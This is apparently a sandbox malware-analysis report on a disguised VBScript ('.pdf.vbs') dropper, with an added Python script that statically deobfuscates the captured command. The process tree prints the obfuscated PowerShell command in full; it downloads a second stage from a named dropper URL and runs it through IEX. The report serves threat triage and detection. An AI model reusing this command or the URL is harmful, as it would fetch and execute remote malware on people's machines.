Analysis

Max time kernel: 120s
Max time network: 120s
Platform: windows7_x64
Resource: win7-en-20211014
Submitted: 25-10-2021 06:15

Static task: static1
Behavioral task: behavioral1
Sample: ATGSVCN64670.pdf.vbs
Resource: win7-en-20211014 (windows7_x64)
0 signatures
0 seconds
General

Target: ATGSVCN64670.pdf.vbs
Size: 741B
MD5: e06db4f9c991c9e5e4df226f567b8a99
SHA1: 389820f7a7449f175ee6a5bb2d80004f42613638
SHA256: b1a19a89c4c0b8efa1ebf594bd266b914e3f5621d12edff2fbf4d48bb0e32447
SHA512: bddc4feed5b04b276b9fb0dc85825a1455efb6c297e182680e918523f4bf96a73d990a3dcd61a1a6d6a65bbd5a2e5f974b1d77d27c301ed46e58a54849328a19
Score: 10/10
Malware Config

Extracted
Language: ps1
Deobfuscated
URLs
ps1.dropper: https://lacycoligan.com/.Final.txt
Signatures

Blocklisted process makes network request (2 IoCs)
Processes:
  flow  pid  process
  5     108  powershell.exe
  6     108  powershell.exe

Enumerates physical storage devices (1 TTPs)
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

Suspicious behavior: EnumeratesProcesses (1 IoCs)
Processes:
  pid  process
  108  powershell.exe

Suspicious use of AdjustPrivilegeToken (1 IoCs)
Processes:
  description              pid  process
  Token: SeDebugPrivilege  108  powershell.exe

Suspicious use of WriteProcessMemory (3 IoCs)
Processes:
  description                      pid   process      target process
  PID 1648 wrote to memory of 108  1648  WScript.exe  powershell.exe
  PID 1648 wrote to memory of 108  1648  WScript.exe  powershell.exe
  PID 1648 wrote to memory of 108  1648  WScript.exe  powershell.exe
Processes

C:\Windows\System32\WScript.exe
  Command line: "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\ATGSVCN64670.pdf.vbs"
  - Suspicious use of WriteProcessMemory

  C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe (spawned by WScript.exe)
    Command line (as recorded; the capture ends mid-expression): "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command [void] [System.Reflection.Assembly]::LoadWithPartialName('Microsoft.VisualBasic');$fj=[Microsoft.VisualBasic.Interaction]::CallByname((New-Object Net.WebClient),'Dow^!loadStri^!g'.replace('^!','n'),[Microsoft.VisualBasic.CallType]::Method,'https://+++++++++++++++++++++.com/.Final.txt'.Replace('+++++++++++++++++++++','lacycoligan'))|IEX;[Byte[]]$f=[Microsoft.VisualBasic.Interaction]::CallByname
    - Blocklisted process makes network request
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
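The recorded PowerShell command hides its two tell-tale strings behind string.Replace() calls: the method name 'DownloadString' is spelled with '^!' in place of 'n', and the dropper host is written as a run of '+' characters that a second Replace() swaps for 'lacycoligan'. The assembled name is then invoked late-bound through Microsoft.VisualBasic.Interaction.CallByName on a Net.WebClient, and the downloaded text is piped to IEX, so neither "DownloadString" nor the domain appears literally on the command line. The script below is an added example, not part of the sandbox report, that folds those literal Replace() calls statically (no execution) and pulls out the URL and the indicators; the command line constant is copied from the process tree above, and the folding only handles single-quoted literal receivers and arguments, which is an assumption about this obfuscation style.

```python
import json
import re

# Added example, not part of the sandbox report. RECORDED_CMDLINE is the
# PowerShell argument recorded in the process tree above (the capture ends
# mid-expression, exactly as shown on the page).
RECORDED_CMDLINE = (
    "[void] [System.Reflection.Assembly]::LoadWithPartialName('Microsoft.VisualBasic');"
    "$fj=[Microsoft.VisualBasic.Interaction]::CallByname((New-Object Net.WebClient),"
    "'Dow^!loadStri^!g'.replace('^!','n'),[Microsoft.VisualBasic.CallType]::Method,"
    "'https://+++++++++++++++++++++.com/.Final.txt'.Replace('+++++++++++++++++++++','lacycoligan'))"
    "|IEX;[Byte[]]$f=[Microsoft.VisualBasic.Interaction]::CallByname"
)

# A PowerShell single-quoted literal: no escapes except '' for one quote.
_SQ = r"'((?:[^']|'')*)'"
# 'literal'.Replace('old', 'new') in any casing, with optional whitespace.
REPLACE_CALL = re.compile(
    rf"{_SQ}\s*\.\s*replace\s*\(\s*{_SQ}\s*,\s*{_SQ}\s*\)", re.IGNORECASE
)
URL_RE = re.compile(r"https?://[\w.-]+(?:/[^\s'\"<>|)]*)?", re.IGNORECASE)


def _unquote(s: str) -> str:
    return s.replace("''", "'")


def _quote(s: str) -> str:
    return "'" + s.replace("'", "''") + "'"


def fold_replace_calls(cmdline: str) -> str:
    """Statically fold 'str'.Replace('a','b') into the literal it evaluates to.

    Only literal receivers and literal arguments are touched, so nothing is
    executed. Runs to a fixed point so chained calls fold too. .NET
    String.Replace with string arguments is case-sensitive, as is str.replace.
    """
    def fold(m):
        s, old, new = (_unquote(g) for g in m.groups())
        return _quote(s.replace(old, new))

    prev = None
    while prev != cmdline:
        prev = cmdline
        cmdline = REPLACE_CALL.sub(fold, cmdline)
    return cmdline


def extract_urls(text: str) -> list:
    return sorted(set(URL_RE.findall(text)))


def analyse(cmdline: str) -> dict:
    """Fold the string obfuscation and report the indicators a triager wants."""
    deob = fold_replace_calls(cmdline)
    return {
        "deobfuscated": deob,
        "urls": extract_urls(deob),
        # WebClient.DownloadString reached by name via CallByName (late binding)
        "late_bound_download": bool(
            re.search(r"CallByName\b.*\bDownloadString\b", deob, re.IGNORECASE | re.DOTALL)
        ),
        # downloaded text piped straight into Invoke-Expression
        "pipes_to_iex": bool(re.search(r"\|\s*(IEX|Invoke-Expression)\b", deob, re.IGNORECASE)),
    }


if __name__ == "__main__":
    print(json.dumps(analyse(RECORDED_CMDLINE), indent=2))
```

Run against the raw command line, extract_urls() finds nothing, because the scheme is followed by '+' characters rather than a hostname; after folding it returns https://lacycoligan.com/.Final.txt, the same ps1.dropper URL the sandbox lists under Malware Config. The second stage served from that URL is not on this page and the script deliberately never fetches it.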
Network
MITRE ATT&CK Matrix ATT&CK v6
Downloads

memory/108-56-0x0000000000000000-mapping.dmp
memory/108-58-0x000007FEF2DE0000-0x000007FEF393D000-memory.dmp  (11.4MB)
memory/108-61-0x0000000002834000-0x0000000002837000-memory.dmp  (12KB)
memory/108-60-0x0000000002832000-0x0000000002834000-memory.dmp  (8KB)
memory/108-59-0x0000000002830000-0x0000000002832000-memory.dmp  (8KB)
memory/108-62-0x000000001B750000-0x000000001BA4F000-memory.dmp  (3.0MB)
memory/108-63-0x000000000283B000-0x000000000285A000-memory.dmp  (124KB)
memory/1648-55-0x000007FEFBF81000-0x000007FEFBF83000-memory.dmp  (8KB)